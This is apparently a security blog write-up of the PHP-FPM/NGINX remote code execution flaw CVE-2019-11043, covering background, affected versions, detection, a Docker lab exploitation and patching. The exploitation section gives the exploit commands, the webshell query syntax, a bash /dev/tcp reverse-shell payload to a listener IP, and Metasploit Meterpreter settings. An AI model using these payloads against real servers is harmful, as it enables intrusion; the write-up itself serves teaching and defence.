PHP FastCGI Process Manager (FPM) Buffer Overflow Vulnerability (CVE-2019-11043)
Date Added to KEV Catalog: March 25, 2022
CISA Due Date for Remediation: April 15, 2022
Table of Contents
Vulnerability
Overview
This vulnerability, “phuip-fpizdam” or CVE-2019-11043, was originally discovered by Andrew Danau, a Wallarm security researcher. In September 2019 during a capture the flag event, RealWorld CTF, he noticed that a server responded with more data when he added a newline byte (%0a). Andrew and his teammates determined it was a memory corruption vulnerability, a buffer overflow vulnerability, which could lead to remote code execution.
The KEV catalog CVE summarizes this:
In some versions of PHP in certain configurations of FPM setup, it is possible to cause FPM module to write past allocated buffers allowing the possibility of remote code execution.
PHP-FPM
FPM is FastCGI Process Manager. CGI (Common Gateway Interface) is a protocol for interfacing programs with webservers. An example would be users using a browser to request resources from a webserver. FastCGI is a protocol that aims to speed up how many requests a webserver can handle by reducing the overhead between the webserver and CGI programs. PHP-FPM is a specific FPM version that aims to help NGINX servers process PHP pages faster.
Summary
Acknowledgement: This vulnerability overview comes from a Wallarm post, the Qualys post, and a full technical description here.
This vulnerability is specific to PHP-FPM enabled on NGINX servers and due to specific configurations. The vulnerability is due to code in fpm_main.c specifically the directive fastcgi_split_path_info.
When fastcgi_split_path_info processes a URI with a newline %0a character, it sets the env_path_info to an empty value. This is an issue because the env_path_info is later used to calculate the path_info value. This empty value provides the space needed to write before path_info which eventually can be used to forge the PHP_VALUE, and later get code execution. Ultimately the exploit accomplishes code execution by increasing the path_info and query_string lengths and changing the PHP_VALUE.
The Orange blog post really explains the vulnerability best.
Systems Affected and Detection
Vulnerable Systems have:
- PHP Versions: 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 of PHP-FPM on NGINX.
- PHP-FHM enabled, along with specific configurations.
- NGINX server
A local system PHP version check can be done with: php -v
A local check for PHP-fpm can be checked with the -i information option, and grep for fpm: php -i | grep fpm
On Github, phuip-fpizdam also checks this CVE with the –-only-qsl
![](https://secured.ai/wp-content/uploads/2023/03/2023-03-15-10_46_36-Clone-of-Kali-OSCP-VMware-Workstation.jpg)
Common tools like Nmap and Curl commands remotely detect NGINX and PHP versions.
Common vulnerability scanners like Tenable and Qualys also detect for CVE-2019-11043.
Exploitation
Vulnerable Environment Setup
Neex, the exploit author, provides a vulnerable environment to test exploitation.
- git clone https://github.com/neex/phuip-fpizdam
- cd phuip-fpizdam/reproducer/
- docker build -t reproduce-cve-2019-11043
- docker run –rm -ti -p 8080:80 reproduce-cve-2019-11043
In this environment the vulnerable NGINX server is locally hosted via a http proxy on port 8080.
This vulnerability can be exploited through a GitHub exploit and with a Metasploit module. Let’s see how to get a reverse shell using both methods.
Exploitation
Identifying this vulnerability relies on recognizing the NGINX server is running the vulnerable PHP-FPM. Nmap shows it is a NGINX 1.14.0 server:
![](https://secured.ai/wp-content/uploads/2023/03/2023-03-15-10_43_05-Clone-of-Kali-OSCP-VMware-Workstation.jpg)
Google or using the site endoflife.date quickly shows that this NGINX server is deprecated.
NGINX 1.14 was released in April 2018. The latest NGINX is 1.23.3 from December 2022.
![](https://secured.ai/wp-content/uploads/2023/03/2023-03-15-09_39_43-nginx-_-endoflife.date_-1170x530.jpg)
It also shows Ubuntu, which has the standard /var/www/html/index.nginx-debian.html:
![](https://secured.ai/wp-content/uploads/2023/03/2023-03-15-11_04_30-Clone-of-Kali-OSCP-VMware-Workstation.jpg)
This vulnerable environment doesn’t show index.php but does show the PHP version with curl:
![](https://secured.ai/wp-content/uploads/2023/03/2023-03-15-11_10_05-Clone-of-Kali-OSCP-VMware-Workstation.jpg)
The PHP version is 7.1.33 dev.
https://endoflife.date/PHP shows the latest PHP version is 8.2.4 and PHP 7.1.33 version was released in 24 Oct 2019.
![](https://secured.ai/wp-content/uploads/2023/03/2023-03-15-09_40_29-PHP-_-endoflife.date_.jpg)
The PHP ChangeLog is super helpful because it often includes release notes and past bugs. It shows that this version is PHP-FHM, has a Fixed bug #78599, which the RCE vulnerability CVE-2019-11043:
![](https://secured.ai/wp-content/uploads/2023/03/2023-03-15-13_21_24-PHP_-PHP-7-ChangeLog-1.jpg)
Googling PHP/7.1.33 dev NGINX/1.14.0 would also lead directly to this article by Qualys:
![](https://secured.ai/wp-content/uploads/2023/03/2023-03-15-11_12_31-PHP-Remote-Code-Execution-Vulnerability-CVE-2019-11043-_-Qualys-Security-Blog-1170x330.jpg)
Searchsploit and Exploit-DB also provide both the Metasploit and GitHub exploits:
![](https://secured.ai/wp-content/uploads/2023/03/2023-03-15-11_31_26-Clone-of-Kali-OSCP-VMware-Workstation.jpg)
The Metasploit module path is: exploit/http/PHP_fpm_rce
The other PHP-FPM entry points to the GitHub exploit:
![](https://secured.ai/wp-content/uploads/2023/03/2023-03-15-09_47_19-PHP-FPM-Nginx-Remote-Code-Execution-PHP-webapps-Exploit.jpg)
This exploit provides command execution via a PHP webshell.
This Github repository is the same as for our vulnerable environment, and identifies the vulnerable script, but we could also use gobuster for PHP file enumeration:
gobuster dir -u http://localhost:8080 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x PHP
This shows a script.php file which we can target.
![](https://secured.ai/wp-content/uploads/2023/03/2023-03-15-11_05_52-Clone-of-Kali-OSCP-VMware-Workstation.jpg)
From Github we can install the exploit:
go install github.com/neex/phuip-fpizdam@latest
After it is installed we can switch to the go directory. Verify go path: go env GOPATH
This exploit requires a PHP file, in this case script.php, and has a test option: –only-qsl
./phuip-fpizdam http://localhost:8080/script.PHP –only-qsl
![](https://secured.ai/wp-content/uploads/2023/03/2023-03-15-10_46_36-Clone-of-Kali-OSCP-VMware-Workstation-1.jpg)
It shows it is probably vulnerable. We can now run it without the test option to exploit:
![](https://secured.ai/wp-content/uploads/2023/03/2023-03-15-10_51_38-Clone-of-Kali-OSCP-VMware-Workstation.jpg)
The exploit uses a Query String Length (QSL) of 1760 and attacks using PHP.ini settings. It is sending PHP INI directives to create a file which gives code execution.
The output points to the location of the PHP webshell:
Was able to execute a command by appending “?a=/bin/sh+-c+’which+which’&” to URLs
Note: You will have to run the commands multiple times to get a response.
![](https://secured.ai/wp-content/uploads/2023/03/2023-03-15-10_52_21-Clone-of-Kali-OSCP-VMware-Workstation.jpg)
Commands can be executed following script.PHP?a= <CMD>
It shows we have remote code execution as www-data.
Code Execution to Reverse Shell
The example command /bin/sh+-c+’which+which’ can be used to quickly see if netcat, bash or other binaries are installed.
Switching to Burp Suite we can run which bash. It shows bash is installed:
![](https://secured.ai/wp-content/uploads/2023/03/2023-03-15-10_59_12-Clone-of-Kali-OSCP-VMware-Workstation.jpg)
Note: if you are running the vulnerable environment via port 8080, you will need to switch the Burp proxy port.
We can switch /bin/sh to /bin/bash and try a popular bash reverse shell from Pentest Monkey:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Change the IP and port and /bin/sh to /bin/bash to get:
GET /script.PHP?a=/bin/bash+-c+’bash -i >& /dev/tcp/192.168.146.141/443 0>&1′
This sends a reverse shell to our local port listening on port 443 where we get a reverse shell:
![](https://secured.ai/wp-content/uploads/2023/03/2023-03-15-11_01_46-Clone-of-Kali-OSCP-VMware-Workstation.jpg)
Metasploit Exploit: exploit/http/PHP_fpm_rce
This Metasploit module is based off of neex’s exploit and provides a PHP Meterpreter reverse shell.
Prior to running the exploit set: RHOSTS, RPORT, TARGETURI, PAYLOAD and LHOST:
![](https://secured.ai/wp-content/uploads/2023/03/2023-03-15-11_18_55-Clone-of-Kali-OSCP-VMware-Workstation.jpg)
It also runs the which command as a check, and leads to a Meterpreter reverse shell:
![](https://secured.ai/wp-content/uploads/2023/03/2023-03-15-11_19_13-Clone-of-Kali-OSCP-VMware-Workstation.jpg)
Remediation
This vulnerability affects PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11. Patch your system by updating PHP.
References:
- https://github.com/neex/phuip-fpizdam
- https://www.infosecmatter.com/metasploit-module-library/
- https://nvd.nist.gov/vuln/detail/CVE-2019-11043
- https://lab.wallarm.com/PHP-remote-code-execution-0-day-discovered-in-real-world-ctf-exercise/
- https://blog.qualys.com/product-tech/2019/10/30/PHP-remote-code-execution-vulnerability-cve-2019-11043
- https://blog.orange.tw/2019/10/an-analysis-and-thought-about-recently.html